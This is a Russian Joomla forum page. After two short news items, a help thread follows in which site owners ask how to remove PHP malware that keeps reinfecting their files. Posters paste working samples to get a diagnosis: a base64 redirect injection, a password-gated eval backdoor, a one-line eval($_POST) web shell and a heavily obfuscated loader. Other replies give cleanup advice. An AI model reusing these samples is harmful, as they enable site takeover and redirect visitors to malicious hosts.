Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 20 Ответов
  • 11203 Просмотров
*

art-m1987

  • Захожу иногда
  • 124
  • 1 / 1
Уже почти месяц пытаемся бороться с проблемой. Сайт был заражен, как именно, наверное, уже неважно, факт в том, что на сайте засел вирус, который не поддается удалению. То есть его удаляют, но он сова размножается по всем файлам. На сайте работает админ, до него там работал я (конец лета), сейчас я просто помогаю разобраться с проблемой. Компы у всех чистые - вирусов нет ни у меня, ни у нее. Если пробовать переходить на сайт через Яндекс - редирект стоит на вирусную ссылку.

Кто-нибудь сталкивался с подобными проблемами?Что делать?
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
это вирус 'PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7Ym90dG9tOjBweDtsZWZ0Oi0xMDI0M3B4OyI+PGgyPjxhIGhyZWY9Imh0dHA6Ly93d3cudm96dm9kaW1kb20uY29tIiB0YXJnZXQ9Il9ibGFuayI+d3d3LnZvenZvZGltZG9tLmNvbTwvYT48L2gyPjwvZGl2Pg==';

вам надо вирусы удалить
ищите тотал командером по слову base64_decode
и хак слово decode($_POST


благодарность принимаю плюсами или деньгами на R184892837312
*

MarVel

  • Новичок
  • 3
  • 0 / 0
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));
Вот так выглядит этот код, я его удаляю а он через некоторое время появляется вновь, разница лишь в количестве знаков "=" в конце кода.
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
ищите на хосте вирус файл PHP с строчкой decode($_POST
примерно такой <?php if(md5($_POST["password"])=="c2725594aaf2c0327abf7d144c3f991c"){eval(base64_decode($_POST["code"]));}?>

лежит скорее всего в images/post.php

он вскрывает систему завново

*

MarVel

  • Новичок
  • 3
  • 0 / 0
<?php eval(base64_decode($_POST["php"])); ?> вот что в этом файле лежит, это оно? простите, в я в рнр не сильна :(
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
ну начнем с того что в папке images  вообще не должно быть файла post.php если он там есть значит смело удаляем

не забываем
благодарность принимаю плюсами или деньгами на R184892837312
*

MarVel

  • Новичок
  • 3
  • 0 / 0
Я удалила из папки images все файлы с расширением php, полностью удалила вредоносные записи из всех документов, но редирект все равно идет время от времени само по себе меню то пропадает то появляется, при этом если заходить через админку то пишет что нет файлов.. а через буквально пару часов все становится на место и меню уже присутствует и доступно.....
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Смотрите логи доступа. Может поможет http://joomlaforum.ru/index.php/topic,195980.0.html.
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
Цитировать
Я удалила из папки images все файлы с расширением php, полностью удалила вредоносные записи из всех документов, но редирект все равно идет время от времени само по себе меню то пропадает то появляется, при этом если заходить через админку то пишет что нет файлов.. а через буквально пару часов все становится на место и меню уже присутствует и доступно.....
как вариант, удалили не все, или же удалили наоборот что то нужное для работы сайта
у меня был случай когда заразили 9 000 файлов, вы из скольких удалили?
*

rembot

  • Захожу иногда
  • 101
  • 2 / 0
  • +++
http://joomlaforum.ru/index.php/topic,198048.0.html - С помощью скрипта из этой темы можно просканить систему и узнать где вы не почистили. Возможно вредоносный код остался в каком то из файлов модулей.
*

art-m1987

  • Захожу иногда
  • 124
  • 1 / 1
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #10 : 03.02.2012, 13:25:34 »
ничего не помогает...
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #11 : 03.02.2012, 13:29:45 »
ну если ничего не помогает обращайтесь к спецам за деньги, есть коммерческая ветка
*

Fedor Vlasenko

  • Живу я здесь
  • 3845
  • 733 / 7
  • https://fedor-vlasenko.web.app
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #12 : 03.02.2012, 13:31:10 »
ничего не помогает...
из своего опыта. порой легче разархивировать Joomla и ее модули компоненты и т. д и подключить к старой базе.
*

art-m1987

  • Захожу иногда
  • 124
  • 1 / 1
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #13 : 03.02.2012, 13:46:12 »
ну если ничего не помогает обращайтесь к спецам за деньги, есть коммерческая ветка

Плиз, ссылочку дайте.
*

Aleks_El_Dia

  • Moderator
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

genius999

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #15 : 23.02.2013, 03:24:30 »
Люди, у меня во всех PHP файлах вот такая вот бодяга, как быть? К тому же когда пытаюсь добавить материал, кнопки никак не реагируют в админке. За ранее всех благодарю!
Код
<?php /*versio:2.12*/$Il1I=0;$GLOBALS['Il1I'] = 'Y.Y3VybAUiX2luaXQQ!!Q~aYWxsb3dfdXJsX2ZvcGVuMQxqX3NldG9wdA%X2V4ZWMXw;TY2xvc2UcB PGltZyBzcmM9IgIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4$SFRUUF9IT1NUMTI3LgReMTAuJNMTkyLjE2OC4hvlAdwPl^a29ubW8ubmV0hmZ2Fib3Iuc2Uec2lsYmVyLmRlZ#aGF2ZWFwb2tlLmNvbS5hdQ&VWV8Ogb.fZGlzcGxheV9lcnJvcnM x_ZGV0ZXJtaW5hdG9yNmYW5kMi4xMgmRmVoWXg0dzR3ZjB3M2QxPYmFzZTY0X2RlY29kZQrYmFzZTY0X2VuY29kZQHgjaHR0cDovLwLej $NSFRUUF9VU0VSX0FHRU5UdW5pb24otaMUc2VsZWN0nD&TUkVRVUVTVF9VUkkU0NSSVBUX05BTUUUVVFUllfU1RSSU5HPw)@L3RtcC8zXL3RtcAo=TVE1Q{RrVEVNUARVE1QRElSD~{OdXBsb2FkX3RtcF9kaXI(wLgkdmVyc2lvzLQ(DULXBocApSFRUUF9FWEVDUEhQL}EWb3V0_b2s}IfwaHR0cAFOi8v%aZP#L3BnLnBocD91PQUg~Jms9l)JnQ9cGhwJnA9$YJnY9AnNZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkVreFNVbHNTU2w3SUNSUlVUQlBVVThnUFNCUlVWRXdVVkV3TUNneUxDQTJLVHNnSkZFd1QwOVBUeUE5SUNSUlVUQlBVVTh1VVZGUk1GRlJNREFvTVRBc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1VWRlJNRkZSTURBb01qTXNJREl3S1NrZ1BUMGdVVkZSTUZGUk1EQW9ORE1zSURJcEtTQjdJQ1JKYkVsc2JFazlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JKTVVsSmJFa3BPeUJ5WlhSMWNtNGdVVkZSTUZGUk1EQW9ORFVzSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUlJNRTlQVDA4cEtYc2dKRWt4TVRGSmJDQTlJRUFrVVRCUFQwOVBLQ2s3SUNSUk1FOVBVVkVnUFNBa1VWRXdUMUZQTGxGUlVUQlJVVEF3S0RRM0xDQXhNQ2s3SUNSSk1XeEpiR3dnUFNBa1VWRXdUMUZQTGxGUlVUQlJVVEF3S0RVNExDQTNLVHNnSkZGUlQwOVJVU0E5SUNSUlVUQlBVVTh1VVZGUk1GRlJNREFvTmpVc0lESXBMbEZSVVRCUlVUQXdLRFk1TENBM0tUc2dRQ1JSTUU5UFVWRW9KRWt4TVRGSmJDd2dRMVZTVEU5UVZGOVZVa3dzSUNSSk1VbEpiRWtwT3lCQUpGRXdUMDlSVVNna1NURXhNVWxzTENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUFQxRlJLQ1JKTVRFeFNXd3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlBUMUZSS0NSSk1URXhTV3dzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTVEZzYkRGc0lEMGdRQ1JKTVd4SmJHd29KRWt4TVRGSmJDa3BJSHR5WlhSMWNtNGdVVkZSTUZGUk1EQW9ORFVzSURBcE8zMGdRQ1JSVVU5UFVWRW9KRWt4TVRGSmJDazdJSEpsZEhWeWJpQlJVVkV3VVZFd01DZzBOU3dnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCUlVWRXdVVkV3TUNnM09Td2dNVFFwTGlSSk1VbEpiRWt1VVZGUk1GRlJNREFvT1RNc0lETTVLVHNnZlNCOUlHWjFibU4wYVc5dUlIVndaQ2drVVU5UFVVOHdMQ1JKTVVsSmJFa3BleUFrVVRCUk1EQlJJRDBnUUdkbGRHaHZjM1JpZVc1aGJXVW9RQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLREV6TXl3Z01USXBYU2s3SUdsbUlDZ2tVVEJSTURCUklDRTlQU0JSVVZFd1VWRXdNQ2cwTlN3Z01Da2dZVzVrSUhOMGNuQnZjeWdrVVRCUk1EQlJMQ0JSVVZFd1VWRXdNQ2d4TkRVc0lEWXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JSTUZFd01GRXNJRkZSVVRCUlVUQXdLREUxTXl3Z05Da3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkV3VVRBd1VTd2dVVkZSTUZGUk1EQW9NVFU1TENBeE1Ta3BJQ0U5UFNBd0tYc2dKRkZSTUZGUlVUMUFabTl3Wlc0b0pGRlBUMUZQTUN4UlVWRXdVVkV3TUNneE56UXNJRElwS1RzZ1FHWmpiRzl6WlNna1VWRXdVVkZSS1RzZ2FXWWdLRUJwYzE5bWFXeGxLQ1JSVDA5UlR6QXBLWHNnZDNKcGRHVW9KRkZQVDFGUE1Dd2daMlYwWm1sc1pTZ2tTVEZKU1d4SktTazdJSDA3SUgwZ2ZTQWtTV3d4Ykd4SklEMGdRWEp5WVhrb1VWRlJNRkZSTURBb01UYzVMQ0F4TWlrc0lGRlJVVEJSVVRBd0tERTVNeXdnTVRFcExDQlJVVkV3VVZFd01DZ3lNRFVzSURFeUtTd2dVVkZSTUZGUk1EQW9NakU1TENBeU1pa3BPeUFrU1RGSlNURnNJRDBnSkVsc01XeHNTVnN4WFRzZ1puVnVZM1JwYjI0Z2QzSnBkR1VvSkZGUFQxRlBNQ3drU1RGSlNURXhLWHNnYVdZZ0tDUlJNRkV3VVZFOVFHWnZjR1Z1S0NSUlQwOVJUekFzVVZGUk1GRlJNREFvTVRjMExDQXlLU2twZXlCQVpuZHlhWFJsS0NSUk1GRXdVVkVzSkVreFNVa3hNU2s3SUVCbVkyeHZjMlVvSkZFd1VUQlJVU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQnZkWFJ3ZFhRb0pFa3hNVEV4TVN3Z0pGRXdVVkZQTUNsN0lHVmphRzhnVVZGUk1GRlJNREFvTWpRekxDQXpLUzRrU1RFeE1URXhMbEZSVVRCUlVUQXdLREkwTml3Z01pa3VKRkV3VVZGUE1DNGlYSEpjYmlJN0lIMGdablZ1WTNScGIyNGdjR0Z5WVcwb0tYc2djbVYwZFhKdUlGRlJVVEJSVVRBd0tEUTFMQ0F3S1RzZ2ZTQkFhVzVwWDNObGRDaFJVVkV3VVZFd01DZ3lOVEVzSURFNUtTd2dNQ2s3SUdSbFptbHVaU2hSVVZFd1VWRXdNQ2d5TnpNc0lERTJLU3dnTVNrN0lDUlJNREF3VVZFOVVWRlJNRkZSTURBb01qa3hMQ0EwS1RzZ0pGRlBUekJQVVQxUlVWRXdVVkV3TUNneU9UVXNJRFlwT3lBa1VWRlBVVTh3UFZGUlVUQlJVVEF3S0RNd01pd2dNakFwT3lBa1NVa3hiRWxKUFZGUlVUQlJVVEF3S0RNeU15d2dNVGdwT3lBa1VWRlJVVEJSUFZGUlVUQlJVVEF3S0RNME1pd2dNVGdwT3lBa1NVbEpiR3hzUFZGUlVUQlJVVEF3S0RNMk15d2dNVEFwT3lBa1NVbEpiR3hzTGoxemRISjBiMnh2ZDJWeUtFQWtYMU5GVWxaRlVsdFJVVkV3VVZFd01DZ3hNek1zSURFeUtWMHBPeUFrU1d4c01Xd3hJRDBnUUNSZlUwVlNWa1ZTVzFGUlVUQlJVVEF3S0RNM09Td2dNakFwWFRzZ1ptOXlaV0ZqYUNBb0pGOUhSVlFnWVhNZ0pFa3hNVEV4TVQwK0pGRXdVVkZQTUNsN0lHbG1JQ2h6ZEhKd2IzTW9KRkV3VVZGUE1DeFJVVkV3VVZFd01DZ3pPVGtzSURjcEtTbDdKRjlIUlZSYkpFa3hNVEV4TVYwOVVWRlJNRkZSTURBb05EVXNJREFwTzMwZ1pXeHpaV2xtSUNoemRISndiM01vSkZFd1VWRlBNQ3hSVVZFd1VWRXdNQ2cwTVRFc0lEZ3BLU2w3SkY5SFJWUmJKRWt4TVRFeE1WMDlVVkZSTUZGUk1EQW9ORFVzSURBcE8zMGdmU0JwWmlnaGFYTnpaWFFvSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRJekxDQXhOU2xkS1NrZ2V5QWtYMU5GVWxaRlVsdFJVVkV3VVZFd01DZzBNak1zSURFMUtWMGdQU0JBSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRNNExDQXhOU2xkT3lCcFppaEFKRjlUUlZKV1JWSmJVVkZSTUZGUk1EQW9ORFV6TENBeE5pbGRLU0I3SUNSZlUwVlNWa1ZTVzFGUlVUQlJVVEF3S0RReU15d2dNVFVwWFNBdVBTQlJVVkV3VVZFd01DZzBOamtzSURJcElDNGdRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLRFExTXl3Z01UWXBYVHNnZlNCOUlHbG1JQ2drVVU4d1R6QlBQU1JKU1Vsc2JHd3VRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLRFF5TXl3Z01UVXBYU2w3SUNSSk1VbHNiRWs5UUcxa05TZ2tTVWxKYkd4c0xpUlJUMDh3VDFFdVVFaFFYMDlUTGlSUlVVOVJUekFwT3lBa1VWRlJVVEF3UFZGUlVUQlJVVEF3S0RRM015d2dOeWs3SUNSUlVVOVJUMUVnUFNCQmNuSmhlU2hSVVZFd1VWRXdNQ2cwT0RJc0lEWXBMQ0JBSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRreExDQTBLVjBzSUVBa1gxTkZVbFpGVWx0UlVWRXdVVkV3TUNnME9UZ3NJRFlwWFN3Z1FDUmZSVTVXVzFGUlVUQlJVVEF3S0RRNU1Td2dOQ2xkTENCQUpGOUZUbFpiVVZGUk1GRlJNREFvTlRBMUxDQTRLVjBzSUVBa1gwVk9WbHRSVVZFd1VWRXdNQ2cwT1Rnc0lEWXBYU3dnUUdsdWFWOW5aWFFvVVZGUk1GRlJNREFvTlRFM0xDQXhPU2twS1RzZ1ptOXlaV0ZqYUNBb0pGRlJUMUZQVVNCaGN5QWtTV3hKTVVreEtYc2dhV1lnS0NGbGJYQjBlU2drU1d4Sk1Va3hLU2w3SUNSSmJFa3hTVEV1UFVSSlVrVkRWRTlTV1Y5VFJWQkJVa0ZVVDFJN0lHbG1JQ2hBYVhOZmQzSnBkR0ZpYkdVb0pFbHNTVEZKTVNrcGV5QWtVVkZSVVRBd0lEMGdKRWxzU1RGSk1Uc2dZbkpsWVdzN0lIMGdmU0I5SUNSMGJYQTlKRkZSVVZFd01DNVJVVkV3VVZFd01DZzFNemdzSURJcExpUkpNVWxzYkVrN0lHbG1JQ2hBSkY5VFJWSldSVkpiSWtoVVZGQmZXVjlCVlZSSUlsMDlQU1JKTVVsc2JFa3BleUJsWTJodklDSmNjbHh1SWpzZ1FHOTFkSEIxZENoUlVWRXdVVkV3TUNnMU5ERXNJRGdwTENBa1VVOVBNRTlSTGxGUlVUQlJVVEF3S0RVMU1Dd2dNaWt1SkZFd01EQlJVUzVSVVZFd1VWRXdNQ2cxTlRVc0lEWXBLVHNnYVdZZ0tDUkpiR3hzYkRFOUpFbEpNV3hKU1NoQUpGOVRSVkpXUlZKYlVWRlJNRkZSTURBb05UWXlMQ0F4TmlsZEtTbDdJRUJsZG1Gc0tDUkpiR3hzYkRFcE95QmxZMmh2SUNKY2NseHVJanNnUUc5MWRIQjFkQ2hSVVZFd1VWRXdNQ2cxT0RJc0lEUXBMQ0JSVVZFd1VWRXdNQ2cxT0Rjc0lETXBLVHNnZlNCbGVHbDBLREFwT3lCOUlHbG1JQ2hBYVhOZlptbHNaU2drZEcxd0tTbDdJRUJwYm1Oc2RXUmxYMjl1WTJVb0pIUnRjQ2s3SUgwZ1pXeHpaWHNnSkZGUE1FOHdUejFBZFhKc1pXNWpiMlJsS0NSUlR6QlBNRThwT3lCMWNHUW9KSFJ0Y0N4UlVWRXdVVkV3TUNnMU9UUXNJRFlwTGxGUlVUQlJVVEF3S0RZd01Td2dOQ2t1SkVsc01XeHNTVnN3WFM1UlVWRXdVVkV3TUNnMk1UQXNJREUwS1M0a1VVOHdUekJQTGxGUlVUQlJVVEF3S0RZeU55d2dOQ2t1SkVreFNXeHNTUzVSVVZFd1VWRXdNQ2cyTXpNc0lERXlLUzRrVVRBd01GRlJMbEZSVVRCUlVUQXdLRFkwTnl3Z05Da3VKRkZQVHpCUFVTazdJSDBnZlNCOSIpKTswcHJlZ19yZXBsYWNlxul6261736536345f6465636f6465';if (!function_exists('QQQ0QQ00')){function QQQ0QQ00($a, $b){$c=$GLOBALS['Il1I']; $d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b));}};$Q0QOOOQ00 = QQQ0QQ00(6474, 16);$Q0QOOOQ00("/Il11lIIII/e", QQQ0QQ00(654, 5819), "Il11lIIII");?>
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #16 : 23.02.2013, 05:35:17 »
Бодягу удалить.Проверить JavaScript, а лучше перезалить файлы как было написано выше.
*

mysuccess

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #17 : 05.06.2013, 15:40:02 »
Как найти источник? Как он может выглядеть (код)?
*

LyalyaChornaya

  • Захожу иногда
  • 236
  • 15 / 1
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #18 : 05.06.2013, 16:03:03 »
Недавно было тоже самое. Сначала пробовала по очереди открывать файлы и чистить, но просидев часа 2, поняла, что это... надолго... Если у вас стоит Акеба бэкап, то вытаскивайте последний бэкап перед заражением и восстанавливайте, единственный выход, у меня все прекрасно получилось именно таким методом. Если нет - на хосте должны быть автокопии. Чистить 20 000 файлов представляете, сколько времени займет, да вдобавок зараженные файлы опять заражают те, что уже подчищены.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #19 : 05.06.2013, 16:20:21 »
Вот вот- Акеба помощник хакера № 2, согласно установок хакеров по взлому сайтов Joomla.
Как найти источник? Как он может выглядеть (код)?
В раздел Безопасность, и там есть почти все- и код, и как найти источник/бекдор/шелл
*

LyalyaChornaya

  • Захожу иногда
  • 236
  • 15 / 1
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #20 : 06.06.2013, 09:04:11 »
Цитировать
согласно установок хакеров по взлому сайтов Joomla
Где б эти установки прочитать, чтоб так не делать? ;D
 Ну тем не менее, акеба только и спас
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Joomla 1.5 как убрать кнопку редактировать материант с сайта

Автор andriy465

Ответов: 5
Просмотров: 4139
Последний ответ 12.11.2023, 23:37:03
от all_zer
На сайте правая колонна ушла в низ

Автор vityavoluevich

Ответов: 3
Просмотров: 2629
Последний ответ 27.10.2023, 08:45:48
от vityavoluevich
Каков ваш заработок на сайте?возможно ли пролететь и создать не прибыльный сайт?

Автор bedalex

Ответов: 3
Просмотров: 5411
Последний ответ 05.06.2023, 11:00:40
от Ритулька88
Нужно wiki под Joomla

Автор THE KILLERS

Ответов: 9
Просмотров: 9737
Последний ответ 05.11.2020, 20:56:47
от Kijv
Поиск статьи по url сайта в админке Joomla 1.5

Автор Tema

Ответов: 5
Просмотров: 2240
Последний ответ 14.08.2020, 07:16:44
от rsn